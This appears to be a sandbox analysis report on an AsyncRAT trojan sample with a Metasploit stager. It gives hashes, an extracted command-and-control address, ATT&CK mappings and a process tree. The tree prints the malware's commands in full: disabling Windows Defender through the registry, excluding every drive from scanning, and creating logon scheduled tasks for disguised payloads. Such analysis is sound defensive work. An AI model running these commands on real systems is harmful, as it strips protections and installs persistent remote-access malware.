asyncrat | 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22

Analysis

max time kernel
142s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 19:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
Size

13.0MB
MD5

66f293c1394e81b02da06a86f5bcb249
SHA1

ac0b8acc5eb9395d6a8a40be01a3e75a7208e23c
SHA256

00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22
SHA512

b3bd8252473e9960cdf32d3d89e6f1df3ced96621ae12d085e58705dd12803d5a3e90e1a6899545921f7f32f2bf9072fd26d147a0dd2fb4d3edc21f0a756ca1e
SSDEEP

393216:mtoHOLHsaSZ2pczKc1esHdZYjzGLO51D6GCoJ:NOL7mH9ZEN5h6RE

Score

10^/10

asyncrat metasploit default backdoor defense_evasion discovery evasion execution rat trojan

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:3001

108.252.227.16:3001

Attributes

delay
1
install
true
install_file
dsg$4yt.exe
install_folder
%AppData%

aes.plain

Extracted

Family

metasploit

Version

metasploit_stager

0.0.0.0:3000

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000700000002427a-16.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4516	powershell.exe
1992	powershell.exe
2472	powershell.exe
2788	powershell.exe
2536	powershell.exe
816	powershell.exe
4764	powershell.exe
5520	powershell.exe
6064	powershell.exe
2920	powershell.exe
2240	powershell.exe
4924	powershell.exe
536	powershell.exe
4160	powershell.exe
4620	powershell.exe
3800	powershell.exe
4812	powershell.exe
5408	powershell.exe
1980	powershell.exe
3488	powershell.exe
4824	powershell.exe
4052	powershell.exe
4064	powershell.exe
5088	powershell.exe
1896	powershell.exe
2120	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 5 IoCs

pid	Process
5760	HOlC2.1.exe
5764	svchost.exe
5116	HOIC.2.1.exe
5404	dsg$4yt.exe
4528	Anti Malware Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HOIC.2.1.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4584	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
816	schtasks.exe
2544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4516	powershell.exe
4516	powershell.exe
1992	powershell.exe
1992	powershell.exe
4824	powershell.exe
4824	powershell.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
6064	powershell.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
5764	svchost.exe
6064	powershell.exe
4052	powershell.exe
4052	powershell.exe
2920	powershell.exe
2920	powershell.exe
2472	powershell.exe
2472	powershell.exe
2788	powershell.exe
2788	powershell.exe
2536	powershell.exe
2536	powershell.exe
2536	powershell.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe
4064	powershell.exe
4064	powershell.exe
4064	powershell.exe
816	powershell.exe
816	powershell.exe
816	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
5520	powershell.exe
5520	powershell.exe
5520	powershell.exe
2240	powershell.exe
2240	powershell.exe
2240	powershell.exe
4924	powershell.exe
4924	powershell.exe
4924	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	5764	svchost.exe
Token: SeDebugPrivilege	6064	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	5520	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	5404	dsg$4yt.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	4160	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	5408	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3640 wrote to memory of 5760	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	87
PID 3640 wrote to memory of 5760	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	87
PID 3640 wrote to memory of 5764	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	89
PID 3640 wrote to memory of 5764	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	89
PID 5760 wrote to memory of 5244	5760	HOlC2.1.exe	90
PID 5760 wrote to memory of 5244	5760	HOlC2.1.exe	90
PID 5760 wrote to memory of 4100	5760	HOlC2.1.exe	91
PID 5760 wrote to memory of 4100	5760	HOlC2.1.exe	91
PID 5760 wrote to memory of 3676	5760	HOlC2.1.exe	93
PID 5760 wrote to memory of 3676	5760	HOlC2.1.exe	93
PID 3676 wrote to memory of 816	3676	cmd.exe	94
PID 3676 wrote to memory of 816	3676	cmd.exe	94
PID 5760 wrote to memory of 4040	5760	HOlC2.1.exe	95
PID 5760 wrote to memory of 4040	5760	HOlC2.1.exe	95
PID 4040 wrote to memory of 2236	4040	cmd.exe	96
PID 4040 wrote to memory of 2236	4040	cmd.exe	96
PID 5760 wrote to memory of 5480	5760	HOlC2.1.exe	97
PID 5760 wrote to memory of 5480	5760	HOlC2.1.exe	97
PID 5480 wrote to memory of 5132	5480	cmd.exe	98
PID 5480 wrote to memory of 5132	5480	cmd.exe	98
PID 5760 wrote to memory of 1748	5760	HOlC2.1.exe	99
PID 5760 wrote to memory of 1748	5760	HOlC2.1.exe	99
PID 1748 wrote to memory of 4516	1748	cmd.exe	100
PID 1748 wrote to memory of 4516	1748	cmd.exe	100
PID 3640 wrote to memory of 5116	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	92
PID 3640 wrote to memory of 5116	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	92
PID 3640 wrote to memory of 5116	3640	00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe	92
PID 5760 wrote to memory of 2352	5760	HOlC2.1.exe	101
PID 5760 wrote to memory of 2352	5760	HOlC2.1.exe	101
PID 2352 wrote to memory of 1992	2352	cmd.exe	102
PID 2352 wrote to memory of 1992	2352	cmd.exe	102
PID 5760 wrote to memory of 4848	5760	HOlC2.1.exe	103
PID 5760 wrote to memory of 4848	5760	HOlC2.1.exe	103
PID 4848 wrote to memory of 4824	4848	cmd.exe	104
PID 4848 wrote to memory of 4824	4848	cmd.exe	104
PID 5760 wrote to memory of 1072	5760	HOlC2.1.exe	106
PID 5760 wrote to memory of 1072	5760	HOlC2.1.exe	106
PID 1072 wrote to memory of 6064	1072	cmd.exe	107
PID 1072 wrote to memory of 6064	1072	cmd.exe	107
PID 5764 wrote to memory of 1172	5764	svchost.exe	108
PID 5764 wrote to memory of 1172	5764	svchost.exe	108
PID 5764 wrote to memory of 2340	5764	svchost.exe	110
PID 5764 wrote to memory of 2340	5764	svchost.exe	110
PID 1172 wrote to memory of 2544	1172	cmd.exe	112
PID 1172 wrote to memory of 2544	1172	cmd.exe	112
PID 2340 wrote to memory of 4584	2340	cmd.exe	113
PID 2340 wrote to memory of 4584	2340	cmd.exe	113
PID 5760 wrote to memory of 2112	5760	HOlC2.1.exe	114
PID 5760 wrote to memory of 2112	5760	HOlC2.1.exe	114
PID 2112 wrote to memory of 4052	2112	cmd.exe	116
PID 2112 wrote to memory of 4052	2112	cmd.exe	116
PID 5760 wrote to memory of 2348	5760	HOlC2.1.exe	117
PID 5760 wrote to memory of 2348	5760	HOlC2.1.exe	117
PID 2348 wrote to memory of 2920	2348	cmd.exe	118
PID 2348 wrote to memory of 2920	2348	cmd.exe	118
PID 5760 wrote to memory of 5972	5760	HOlC2.1.exe	120
PID 5760 wrote to memory of 5972	5760	HOlC2.1.exe	120
PID 5972 wrote to memory of 2472	5972	cmd.exe	121
PID 5972 wrote to memory of 2472	5972	cmd.exe	121
PID 5760 wrote to memory of 1060	5760	HOlC2.1.exe	122
PID 5760 wrote to memory of 1060	5760	HOlC2.1.exe	122
PID 1060 wrote to memory of 2788	1060	cmd.exe	123
PID 1060 wrote to memory of 2788	1060	cmd.exe	123
PID 5760 wrote to memory of 1768	5760	HOlC2.1.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
"C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
    3⤵
    PID:5244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
    3⤵
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\system32\reg.exe
      reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5480
  - - C:\Windows\system32\reg.exe
      reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
    3⤵
    PID:1768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
    3⤵
    PID:2636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
    3⤵
    PID:5384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
    3⤵
    PID:1448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
    3⤵
    PID:4768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
    3⤵
    PID:4796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
    3⤵
    PID:3180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
    3⤵
    PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
    3⤵
    PID:5164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
    3⤵
    PID:4216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
    3⤵
    PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
    3⤵
    PID:3724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
    3⤵
    PID:2560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
    3⤵
    PID:1924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
    3⤵
    PID:5668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
    3⤵
    PID:1596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
    3⤵
    PID:3720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
    3⤵
    PID:2640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
      "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
      4⤵
      Executes dropped EXE
      PID:4528
    - - C:\Windows\SYSTEM32\rundll32.exe
        
        rundll32
        5⤵
        
        PID:860
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp783D.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4584
  - - C:\Users\Admin\AppData\Roaming\dsg$4yt.exe
      "C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5404
- C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5116

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
